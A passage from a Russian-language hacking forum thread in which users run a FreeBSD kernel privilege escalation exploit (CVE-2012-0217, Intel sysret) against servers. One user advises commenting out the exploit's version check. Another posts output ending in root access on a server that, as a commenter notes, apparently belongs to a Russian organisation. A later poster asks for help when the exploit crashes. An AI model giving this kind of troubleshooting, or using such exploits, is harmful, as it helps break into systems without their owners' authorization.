Старый 10.07.2012, 12:29   #21
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
8.3-RELEASE-p2 FreeBSD 8.3-RELEASE-p2 #0: Sat Jun 2 00:20:01 MSK 2012
сплойт из 12 поста отправил в даун


Цитата:
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
objdump: '/boot/kernel/kernel': No such file
col вне форума   Ответить с цитированием
Старый 10.07.2012, 14:17   #22
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

col
Там надо проверку прикрутить на существование /boot/kernel/kernel.
Юзай тот, что в 17-ом посте, он без образа ядра обходится. Но прежде думаю не помешает убедиться, что ты не в jail (т.к. /boot/kernel/kernel отсутствует).
SynQ вне форума   Ответить с цитированием
Старый 10.07.2012, 14:53   #23
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
col
Там надо проверку прикрутить на существование /boot/kernel/kernel.
Юзай тот, что в 17-ом посте, он без образа ядра обходится. Но прежде думаю не помешает убедиться, что ты не в jail (т.к. /boot/kernel/kernel отсутствует).
Цитата:
./syn
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*] Retrieving host information...
[+] CPU: GenuineIntel
[+] sysname: FreeBSD
[+] release: 8.3-RELEASE-p2
[+] version: FreeBSD 8.3-RELEASE-p2 #0: Sat Jun 2 00:20:01 MSK 2012
[+] machine: amd64[*] Validating target OS and version...
[+] NOT Vulnerable :-(
ну да черт с ним

Последний раз редактировалось col; 10.07.2012 в 18:40..
col вне форума   Ответить с цитированием
Старый 10.07.2012, 17:43   #24
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

col
Закомментируй "exit(1);" в main().
SynQ вне форума   Ответить с цитированием
Старый 10.07.2012, 18:41   #25
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
col
Закомментируй "exit(1);" в main().
о, спасибо - сам я что-то недодумался

Цитата:
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*] Retrieving host information...
[+] CPU: GenuineIntel
[+] sysname: FreeBSD
[+] release: 8.3-RELEASE-p2
[+] version: FreeBSD 8.3-RELEASE-p2 #0: Sat Jun 2 00:20:01 MSK 2012
[+] machine: amd64[*] Validating target OS and version...
[+] NOT Vulnerable :-([*] Resolving kernel addresses...
[+] Resolved Xofl to 0xffffffff80597330
[+] Resolved Xbnd to 0xffffffff80597360
[+] Resolved Xill to 0xffffffff80597390
[+] Resolved Xdna to 0xffffffff805973c0
[+] Resolved Xpage to 0xffffffff80597710
[+] Resolved Xfpu to 0xffffffff80597480
[+] Resolved Xalign to 0xffffffff80597540
[+] Resolved Xmchk to 0xffffffff80597420
[+] Resolved Xxmm to 0xffffffff805974b0[*] Setup...
[+] Trigger code...
[+] Trampoline code...[*] Fire in the hole![*] Got root!
id
uid=0(root) gid=0(wheel) groups=0(wheel),1001(mgrsecure)
col вне форума   Ответить с цитированием
Старый 10.07.2012, 21:40   #26
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

8.2-RELEASE-p6 FreeBSD 8.2-RELEASE-p6 #0: Sun Jan 22 08:02:13 MSK 2012 /usr/obj/usr/src/sys/WEB1 amd64

портирование ожидается?)


ЗЫ:А под XEN че нить ожидается?)

Последний раз редактировалось azid; 10.07.2012 в 21:55..
azid вне форума   Ответить с цитированием
Старый 11.07.2012, 16:33   #27
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

> 1001(mgrsecure)

негоже ломать ру сервера!
12309 вне форума   Ответить с цитированием
Старый 15.07.2012, 05:04   #28
overxor
 
Регистрация: 14.10.2011
Сообщений: 73
Репутация: 90
По умолчанию

col, сори моя вина.
У iZsh сплойт лучше проработан в плане полных проверок и получений фукнций через kldsym. Нет необходимости читать данные из файла ядра напрямую.
__________________
[IO]
overxor вне форума   Ответить с цитированием
Старый 15.07.2012, 13:38   #29
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
col, сори моя вина.
нет проблем, в любом случае спасибо за твой труд.
col вне форума   Ответить с цитированием
Старый 05.08.2012, 18:56   #30
Megatron13
 
Регистрация: 05.08.2012
Сообщений: 1
Репутация: 0
По умолчанию

Так, привет всем. у меня вопрос по эксплоиту из поста 17.
при использовании вылезло вот это:
Код:
[*] Retrieving host information...
   [+] CPU: GenuineIntel
   [+] sysname: FreeBSD
   [+] release: 8.3-RELEASE-p3
   [+] version: FreeBSD 8.3-RELEASE-p3 #3: Tue Jun 26 12:14:08 CEST 2012     [тут был адрес сервера]:/usr/obj/usr/src/sys/AMANDA3
   [+] machine: amd64[*] Validating target OS and version...
   [+] NOT Vulnerable :-(
затем я сделал как написано тут
Цитата:
Сообщение от SynQ Посмотреть сообщение
col
Закомментируй "exit(1);" в main().
и при использовании теперь вылезает ошибка Bus error (core dumped).
Что делать? как использовать эксплоит? помогите плз.
Megatron13 вне форума   Ответить с цитированием
Ответ

Метки
freebsd, kernel, privilege escalation

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot